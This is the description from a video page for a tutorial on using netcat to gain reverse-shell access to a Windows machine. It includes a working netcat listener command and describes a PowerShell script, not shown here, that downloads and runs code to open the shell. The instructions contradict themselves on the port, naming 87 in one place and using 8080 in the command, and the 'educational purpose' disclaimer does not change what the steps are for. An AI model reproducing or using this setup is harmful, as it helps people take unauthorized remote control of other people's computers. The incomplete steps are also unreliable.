See how hackers use netcat to enter windows machine ....

preview_player
Показать описание
In this video I will be showing you how to use netcat to gain reverse access to windows machine from basic usage ....

Commands :

THIS IS FOR SETUP IN KALI LINUX

// This script downloads and executes a powershell script effectively opening up a reverse shell

// This script contains IP address of 172.17.45.102 , change it to the hackers ip
// 87 behind the IP is the port . You can change it to your desire in both the script here and the hackers opening port
// enter the above command as root user in linux :
stty raw -echo; (stty size; cat) | nc -lvnp 8080 -s HOST IP
(-s here is ip replace yours ) behind -lvnp is the port

THIS IS FOR THE RECIEVERS (windows powershell ) :

here replace your same IP and port

DISCLAIMER:

This video is only for educational purpose , not to hurt anyone . Do not mislead with the above content shown , if so done youtube and our channel CODESAFEGUARD is not responsible .

Follow me in :
Рекомендации по теме